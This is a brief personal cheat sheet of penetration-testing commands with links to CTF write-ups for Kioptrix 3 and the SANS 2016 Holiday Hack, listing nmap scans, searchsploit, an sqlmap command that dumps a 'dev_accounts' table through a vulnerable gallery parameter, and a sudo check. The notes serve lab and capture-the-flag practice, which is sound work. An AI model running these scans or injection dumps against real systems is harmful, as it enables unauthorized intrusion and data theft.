https://v3ded.github.io/ctf/kioptrix3.html
nmap {domain name} -A -T5(Open Ports & Running Services)searchsploit {item}(Search for vulnerabilities)sqlmap -u kioptrix3.com/gallery/gallery.php?id=1 -T dev_accounts --dump(When you know table name, if you don't leave blank)sudo -l(Find out what commands you can run as sudo when you have shell access)
https://jhalon.github.io/sans-2016-holiday-hack-challenge/
- Hacking Meteor (https://pen-testing.sans.org/blog/2016/12/06/mining-meteor)
nmap -sS -A -sC 104.198.252.157(Extra files on the server?)